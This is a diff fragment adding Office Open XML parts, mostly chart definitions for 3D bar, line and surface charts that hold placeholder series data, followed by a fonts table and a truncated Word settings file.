+<c:axId val="25292288"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="51657728"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="69190400"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="69190400"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="51657728"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="25292288"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="69190400"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:rAngAx val="1"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="clustered"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="pyramid"/>
+<c:axId val="71774208"/>
+<c:axId val="71776128"/>
+<c:axId val="0"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="71774208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="71776128"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="71776128"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="71774208"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="pyramid"/>
+<c:axId val="50252800"/>
+<c:axId val="50255744"/>
+<c:axId val="71870208"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="50252800"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50255744"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="50255744"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50252800"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="71870208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50255744"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,110 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:title>
+<c:layout/>
+</c:title>
+<c:view3D>
+<c:rotX val="30"/>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="bar"/>
+<c:grouping val="clustered"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Sales</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Sq.. 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Sq.. 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Sq.. 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Sq.. 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>8.1999999999999993</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>3.2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.4</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>1.2</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="box"/>
+<c:axId val="50777472"/>
+<c:axId val="50780032"/>
+<c:axId val="0"/>
+</c:bar3DChart>
+<c:valAx>
+<c:axId val="50780032"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50777472"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:catAx>
+<c:axId val="50777472"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50780032"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,228 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:line3DChart>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:axId val="50940928"/>
+<c:axId val="68729472"/>
+<c:axId val="78014208"/>
+</c:line3DChart>
+<c:catAx>
+<c:axId val="50940928"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68729472"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="68729472"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50940928"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="78014208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68729472"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,238 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:surface3DChart>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:bandFmts/>
+<c:axId val="59304576"/>
+<c:axId val="68746240"/>
+<c:axId val="59572224"/>
+</c:surface3DChart>
+<c:catAx>
+<c:axId val="59304576"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68746240"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="68746240"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="59304576"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="midCat"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="59572224"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68746240"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+<c:txPr>
+<a:bodyPr/>
+<a:lstStyle/>
+<a:p>
+<a:pPr rtl="0">
+<a:defRPr/>
+</a:pPr>
+<a:endParaRPr lang="en-US"/>
+</a:p>
+</c:txPr>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:font w:name="Calibri">
+<w:panose1 w:val="020F0502020204030204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="swiss"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Times New Roman">
+<w:panose1 w:val="02020603050405020304"/>
+<w:charset w:val="CC"/>
+<w:family w:val="roman"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Tahoma">
+<w:panose1 w:val="020B0604030504040204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="swiss"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Cambria">
+<w:panose1 w:val="02040503050406030204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="roman"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+</w:font>
+</w:fonts>
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
+<w:zoom w:percent="100"/>
+<w:proofState w:spelling="clean" w:grammar="clean"/>
+<w:defaultTabStop w:val="708"/>
+<w:characterSpacingControl w:val="doNotCompress"/>
+<w:compat/>
+<w:rsids>
+<w:rsidRoot w:val="00D15BD0"/>
+<w:rsid w:val="00D15BD0"/>
+<w:rsid w:val="00F8254F"/>
+</w:rsids>
